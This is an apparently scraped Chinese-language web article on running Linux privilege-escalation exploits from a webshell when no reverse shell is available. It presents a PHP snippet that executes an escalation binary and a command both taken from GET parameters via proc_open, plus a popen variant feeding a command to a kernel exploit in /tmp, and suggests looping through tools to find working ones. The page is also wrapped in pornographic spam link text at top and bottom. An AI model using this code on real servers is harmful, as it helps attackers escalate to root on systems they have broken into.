麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 服務器 > Linux服務器 > 正文

Linux下非交互式提權詳解

2024-09-05 23:03:36
字體:
來源:轉載
供稿:網友

前言

之前拿到某站的Webshell之后,在提權的時候發現網站不能反彈shell。而且,在滲透的時候經常遇到那種不能反彈shell的,你的提權工具拿上去之后因為沒有交互式的環境,也不知道提權是否成功。因此,寫了一個簡單的工具。需要的朋友們可以參考學習。

方法如下

proce_open()

// path是提權工具的絕對路徑,例如:/usr/local/htdocs/2.6.18// cmd是你需要執行的命令,例如:whoamiif(isset($_GET['path']) && isset($_GET['cmd'])){ $path = $_GET['path']; $cmd = $_GET['cmd']; $descriptorspec = array(  0 => array("pipe", "r"),  1 => array("pipe", "w"),  2 => array("pipe", "w") ); $process = proc_open($path, $descriptorspec, $pipes);  if (is_resource($process)) {  fwrite($pipes[0],$cmd);  fclose($pipes[0]);  echo stream_get_contents($pipes[1]);  echo stream_get_contents($pipes[2]);  fclose($pipes[1]);  fclose($pipes[2]);  $return_value = proc_close($process); }  }

代碼很簡單,不懂的可以看看PHP手冊,popen()在這里也可以實現相同的效果

另外,有了這個代碼之后,我們以后提權是不是就可以直接把提權工具扔到服務器上面,然后PHP代碼改一改,循環測試哪些提權工具是可用的了。

popen()

這是土司之前一個人發的,代碼原封不動的放在了下面。稍微改一改就能達到上面一樣的效果

$sucommand = "/tmp/2.6.18-2011";$fp = popen($sucommand ,"w");fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");pclose($fp);

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作能帶來一定的幫助,如果有疑問大家可以留言交流,謝謝大家對VEVB武林網的支持。


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 高清国产午夜精品久久久久久 | 欧美国产一级片 | 色婷婷a v | 国产一区二区不卡 | 成人午夜视频在线观看免费 | 亚洲视频综合 | 妇女毛片| 精品久久久久久久久久久久包黑料 | 精品国产一区二区三区久久久 | 国产88久久久国产精品免费二区 | 国内精品久久久久久久星辰影视 | 欧美成人免费电影 | 国产资源在线播放 | 亚洲特黄| 国产成人高潮免费观看精品 | 国产精品久久久久久久久久iiiii | 国产羞羞视频在线免费观看 | 在线成人免费观看视频 | 99麻豆久久久国产精品免费 | 伊人午夜视频 | 国产精品久久久久久久久久久久久久久久 | 免费黄色小视频网站 | 国产精品成人久久 | 日本a∨精品中文字幕在线 狠狠干精品视频 | 在线视频1区 | 蜜桃av网| 久久精品亚洲欧美日韩精品中文字幕 | 黄色免费av | 亚洲精品a级 | 天天草天天干天天 | 黄色片网站在线免费观看 | 欧美一级毛片欧美一级成人毛片 | 精品少妇v888av | 日韩黄色av | 永久免费av在线 | 精品国产91久久久久久浪潮蜜月 | 49vv看片免费 | 欧美wwwsss9999 | 国产精品视频1区 | 久草在线精品观看 | 亚洲啪 |